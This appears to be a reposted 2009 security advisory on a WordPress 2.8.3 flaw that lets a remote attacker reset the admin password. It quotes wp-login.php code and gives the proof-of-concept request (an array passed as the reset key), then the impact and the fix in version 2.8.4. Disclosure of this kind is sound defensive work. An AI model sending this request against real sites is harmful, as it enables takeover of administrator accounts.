WordPress 2.8.3 Admin Password Reset Exploit

Exploits Input Validation Attacks News / Stories Vulnerabilities

Topic: WordPress <= 2.8.3 Remote admin reset password Credit: Laurent GaffiƩ [Laurent.gaffie(at)gmail.com]
Date: 11.08.2009
Proof Of Concept:

The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address:

http://domain_name.tld/wp-login.php?action=rp&key[]=

You click on the link, and then WordPress reset your admin password, and sends you over another email with your new credentials.
Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users
WHERE
user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST[‘action’]) ? $_REQUEST[‘action’] : ‘login’;
$errors = new WP_Error();

if ( isset($_GET[‘key’]) )
$action = ‘resetpass’;

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’,
‘retrievepassword’,
‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false ===
has_filter(‘login_form_’ . $action) )
$action = ‘login’;
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET[‘key’]);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and then reset the admin password by submitting an array to the $key variable.

Business Impact: An attacker could exploit this vulnerability to reset the admin account of any wordpress/wordpress-mu <= 2.8.3

Solution: WordPress has fixed this problem last night and has been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.

Leave a Reply